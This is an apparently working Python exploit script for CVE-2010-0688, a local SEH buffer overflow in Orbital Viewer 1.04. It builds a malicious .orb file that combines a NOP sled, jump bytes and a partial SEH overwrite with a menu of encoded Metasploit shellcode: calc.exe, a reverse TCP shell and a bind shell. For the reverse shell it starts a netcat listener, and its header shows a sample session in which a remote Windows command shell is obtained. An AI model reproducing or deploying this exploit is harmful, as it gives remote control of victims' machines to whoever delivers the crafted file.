#!/usr/bin/python
#
################################################################
#
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows XP SP3
#
################################################################
# Bad chars: \x00\x0a\xbd\x0d\x20
# Here we go.. ! ...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
# 1: calc.exe
# 2: reverse shell
# 3: bind shell
# [+] which shellcode? 2
# [+] Vulnerable file created!
# [+] Listening on port 4444...
# listening on [any] 4444 ...
# 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Steve>
#
import sys, os
# Banner and title line shown before the interactive payload menu.
BANNER = (
    "|------------------------------------------------------------------|",
    "| __ __ |",
    "| _________ ________ / /___ _____ / /____ ____ _____ ___ |",
    "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |",
    "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |",
    "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |",
    "| |",
    "|-------------------------------------------------[ EIP Hunters ]--|",
    "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit",
)
for banner_line in BANNER:
    print banner_line
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
# Payload for menu choice "1": Metasploit-generated, alpha_mixed-encoded shellcode that
# only launches calc.exe (the harmless proof-of-execution option). 20 fragments of
# 15 bytes plus a final 3-byte one = 303 bytes, matching the generator comment above.
# After the short decoder stub every byte is a printable alphanumeric, as the
# alpha_mixed encoder produces. The blob is opaque data here: this script never
# executes it, it is only concatenated into the output file further down.
calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
"\x50\x41\x41")
# windows/shell_reverse_tcp - 636 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
# Payload for menu choice "2": reverse TCP shell generated for the lab listener
# 192.168.2.10:4444 (the address/port in the generator comment and in the sample
# session in the file header). Those values are presumably fixed inside the encoded
# bytes; the port matches the `nc -lvp 4444` listener this script starts for choice 2.
# 42 fragments of 15 bytes plus a final 6-byte one = 636 bytes, as the comment states.
# Opaque data only -- never executed by this script, just written into the file.
rev = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x43\x44\x45\x57"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4a\x54\x47"
"\x4b\x50\x54\x46\x44\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x47\x54\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
"\x4b\x39\x42\x4c\x51\x34\x45\x4c\x45\x31\x48\x43\x46\x51\x49"
"\x4b\x42\x44\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x48\x56\x45\x36\x46\x33\x43\x56\x45\x38\x46\x53\x46\x52\x43"
"\x58\x43\x47\x43\x43\x47\x42\x51\x4f\x46\x34\x4b\x4f\x4e\x30"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x43\x38"
"\x43\x32\x51\x45\x42\x4a\x43\x32\x4b\x4f\x48\x50\x43\x58\x4e"
"\x39\x45\x59\x4b\x45\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43"
"\x46\x33\x51\x43\x51\x43\x51\x53\x51\x43\x47\x33\x46\x33\x4b"
"\x4f\x4e\x30\x42\x48\x49\x50\x49\x38\x44\x42\x44\x4a\x42\x46"
"\x42\x48\x42\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4b\x51\x4d"
"\x45\x42\x48\x4a\x4c\x4c\x39\x4e\x4a\x43\x50\x51\x47\x4b\x4f"
"\x48\x56\x42\x4a\x42\x30\x46\x31\x50\x55\x4b\x4f\x48\x50\x45"
"\x36\x43\x5a\x42\x44\x45\x36\x42\x48\x43\x53\x42\x4d\x43\x5a"
"\x50\x50\x46\x39\x47\x59\x48\x4c\x4c\x49\x4a\x47\x43\x5a\x47"
"\x34\x4c\x49\x4d\x32\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4a\x35"
"\x4d\x59\x4b\x4d\x4b\x4e\x51\x52\x46\x4d\x4b\x4e\x50\x42\x46"
"\x4c\x4c\x4d\x43\x4a\x47\x48\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48"
"\x44\x32\x4b\x4e\x4e\x53\x42\x36\x4b\x4f\x44\x35\x47\x58\x4b"
"\x4f\x4e\x36\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51"
"\x42\x4a\x45\x51\x46\x31\x50\x51\x46\x35\x46\x31\x4b\x4f\x48"
"\x50\x42\x48\x4e\x4d\x4e\x39\x44\x45\x48\x4e\x46\x33\x4b\x4f"
"\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x4e\x30\x43"
"\x58\x4d\x37\x43\x49\x48\x46\x44\x39\x4b\x4f\x43\x45\x43\x34"
"\x4b\x4f\x49\x46\x4b\x4f\x42\x57\x4b\x4c\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55
# Payload for menu choice "3": bind TCP shell on port 4444 (generator comment);
# RHOST=192.168.2.55 is the lab victim seen in the sample session in the file header.
# Unlike choice 2, the script starts no listener for this option.
# 46 fragments of 15 bytes plus a final 5-byte one = 695 bytes, as the comment states.
# Opaque data only -- never executed by this script, just written into the file.
# NOTE(review): `bind =(` spacing and the trailing `;` on the last line are the
# author's; both are harmless in Python and left untouched here.
bind =("\xdb\xc1\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x43\x5a\x4a\x4b\x50\x4d\x4a\x48\x4c\x39\x4b\x4f\x4b\x4f"
"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47"
"\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a"
"\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4a\x4e\x50\x31"
"\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x44\x47\x49"
"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47\x4b"
"\x50\x54\x47\x54\x47\x58\x42\x55\x4d\x35\x4c\x4b\x51\x4f\x51"
"\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4d"
"\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b"
"\x43\x54\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x47\x30\x44\x4c\x4c"
"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e"
"\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48"
"\x56\x45\x36\x50\x53\x42\x46\x43\x58\x47\x43\x46\x52\x42\x48"
"\x43\x47\x44\x33\x50\x32\x51\x4f\x46\x34\x4b\x4f\x48\x50\x43"
"\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49\x46"
"\x51\x4f\x4c\x49\x4a\x45\x45\x36\x4d\x51\x4a\x4d\x44\x48\x45"
"\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x48\x50\x42\x48\x49\x49"
"\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x50\x53\x46"
"\x33\x46\x33\x46\x33\x51\x43\x50\x43\x50\x53\x47\x33\x50\x53"
"\x4b\x4f\x4e\x30\x45\x36\x42\x48\x44\x51\x51\x4c\x43\x56\x51"
"\x43\x4c\x49\x4b\x51\x4d\x45\x43\x58\x49\x34\x44\x5a\x42\x50"
"\x49\x57\x51\x47\x4b\x4f\x4e\x36\x42\x4a\x44\x50\x46\x31\x50"
"\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4a\x49"
"\x51\x47\x4b\x4f\x49\x46\x50\x53\x46\x35\x4b\x4f\x48\x50\x45"
"\x38\x4d\x35\x51\x59\x4b\x36\x51\x59\x46\x37\x4b\x4f\x4e\x36"
"\x46\x30\x46\x34\x51\x44\x51\x45\x4b\x4f\x48\x50\x4a\x33\x43"
"\x58\x4a\x47\x42\x59\x49\x56\x42\x59\x51\x47\x4b\x4f\x49\x46"
"\x46\x35\x4b\x4f\x4e\x30\x45\x36\x43\x5a\x45\x34\x43\x56\x42"
"\x48\x42\x43\x42\x4d\x4d\x59\x4d\x35\x42\x4a\x46\x30\x51\x49"
"\x47\x59\x48\x4c\x4d\x59\x4b\x57\x43\x5a\x51\x54\x4b\x39\x4a"
"\x42\x50\x31\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x51\x52\x46\x4d"
"\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58\x4e"
"\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x45\x46"
"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x50"
"\x52\x46\x31\x46\x31\x46\x31\x42\x4a\x43\x31\x46\x31\x46\x31"
"\x46\x35\x46\x31\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x48\x59\x45"
"\x55\x48\x4e\x46\x33\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b\x4f"
"\x46\x57\x4b\x4f\x4e\x30\x4c\x4b\x46\x37\x4b\x4c\x4d\x53\x48"
"\x44\x45\x34\x4b\x4f\x48\x56\x50\x52\x4b\x4f\x48\x50\x45\x38"
"\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x46\x33\x4b\x4f\x49\x46\x4b"
"\x4f\x4e\x30\x41\x41");
# Leading 17 bytes of the crafted file; the escapes spell "OrbitalFileV1.0\r\n",
# presumably the .orb format's signature. Note it ends in \x0d\x0a, two of the bad
# chars listed in the file header -- that list applies to the payload, not to this
# signature.
header = "\x4f\x72\x62\x69\x74\x61\x6c\x46"
header += "\x69\x6c\x65\x56\x31\x2e\x30\x0d\x0a"
# 1010-byte NOP (0x90) sled placed directly before the chosen payload.
nops = "\x90" * 1010
# 5-byte x86 near jump: E9 followed by a little-endian rel32 (0xfffff9c8, a backward
# displacement). Appended right after the payload.
fly = "\xe9\xc8\xf9\xff\xff"
# Next-SEH slot: 2-byte short backward jump (EB F9) padded with two NOPs.
nseh = "\xeb\xf9\x90\x90"
# Only 3 bytes, so the top byte of the existing handler pointer is kept as-is -- the
# "partial overwrite" the author mentions; "ppr" is the author's pop/pop/ret gadget.
seh = "\x50\x82\x45" # partial overwrite - ppr from ov.exe
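# Interactive payload choice; the three menu entries map onto the three blobs above.
print "[+] Shellcode options"
print "\t1: calc.exe"
print "\t2: reverse shell"
print "\t3: bind shell"
msg = '[+] which shellcode? '
uin = raw_input(msg).strip()
# Choice -> payload. The original only rejected an empty answer; any other input
# that was not 1/2/3 fell through to the file write with `lol` never assigned.
# A single lookup table now rejects everything that is not a known choice.
payloads = {'1': calc, '2': rev, '3': bind}
if uin not in payloads:
    print "[-] You have not entered 1,2 or 3, quiting"
    sys.exit(1)
shellcode = payloads[uin]
# File layout: signature, "A" filler, NOP sled, payload, then fly/nseh/seh.
# The filler shrinks with the payload so that filler + sled + payload is always
# 5045 + 1010 bytes, keeping fly/nseh/seh at the same file offset for every choice.
junk = "\x41" * (5045 - len(shellcode))
lol = header + junk + nops + shellcode + fly + nseh + seh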
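# Write the assembled file and, for the reverse-shell choice only, start the
# netcat listener the payload was generated for (LPORT=4444, see the generator
# comment on the `rev` blob).
try:
    # `with` closes the handle even if write() raises; the original closed it
    # only on the success path.
    with open("mr_me-owns-orbital.orb",'w') as vulnerable:
        vulnerable.write(lol)
    print "[+] Vulnerable file created!"
    if uin == '2':
        print "[+] Listening on port 4444..."
        os.system("nc -lvp 4444")
except (IOError, OSError) as e:
    # Narrowed from a bare `except:`, which also swallowed KeyboardInterrupt,
    # SystemExit and programming errors; the cause is now reported rather than
    # hidden behind a generic message.
    print "[-] Error occurred: %s" % e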